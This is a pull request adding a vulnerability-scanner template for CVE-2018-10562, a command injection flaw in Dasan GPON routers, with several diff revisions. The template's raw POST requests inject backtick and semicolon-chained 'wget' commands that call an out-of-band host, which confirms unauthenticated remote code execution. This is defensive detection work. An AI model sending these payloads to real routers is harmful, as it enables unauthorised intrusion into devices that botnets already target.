### PR TITLE
Create CVE-2018-10562.yaml

### DIFF
--- a/cves/2018/CVE-2018-10562.yaml
+++ b/cves/2018/CVE-2018-10562.yaml
@@ -6,14 +6,15 @@ info:
   severity: critical
   description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
     - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
+    - https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-actively-exploited-sophos-firewall-bug/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
     cvss-score: 9.80
     cve-id: CVE-2018-10562
     cwe-id: CWE-78
-  tags: cve,cve2018,dasan,gpon,rce
+  tags: cve,cve2018,dasan,gpon,rce,oast
 
 requests:
   - raw:
@@ -21,14 +22,15 @@ requests:
         POST /GponForm/diag_Form?images/ HTTP/1.1
         Host: {{Hostname}}
 
-        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`&ipv=0
+        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0
 
       - |
         POST /GponForm/diag_Form?images/ HTTP/1.1
         Host: {{Hostname}}
 
-        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`&ipv=0
+        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0
 
+    stop-at-first-match: true
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction

--- a/cves/2018/CVE-2018-10562.yaml
+++ b/cves/2018/CVE-2018-10562.yaml
@@ -7,7 +7,7 @@ info:
   description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
   reference:
     - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
-    - https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-actively-exploited-sophos-firewall-bug/
+    - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

--- a/cves/2018/CVE-2018-10562.yaml
+++ b/cves/2018/CVE-2018-10562.yaml
@@ -1,0 +1,36 @@
+id: CVE-2018-10562
+
+info:
+  name: Dasan GPON Devices - Remote Code Execution (Unauthenticated)
+  author: gy741
+  severity: critical
+  description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
+    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+    cvss-score: 9.80
+    cve-id: CVE-2018-10562
+    cwe-id: CWE-78
+  tags: cve,cve2018,dasan,gpon,rce
+
+requests:
+  - raw:
+      - |
+        POST /GponForm/diag_Form?images/ HTTP/1.1
+        Host: {{Hostname}}
+
+        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`&ipv=0
+
+      - |
+        POST /GponForm/diag_Form?images/ HTTP/1.1
+        Host: {{Hostname}}
+
+        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`&ipv=0
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2018-10562

```
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
```

The CVE is old, but according to CISA, botnets appear to be exploiting the vulnerability.

- References:  https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-actively-exploited-sophos-firewall-bug/

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO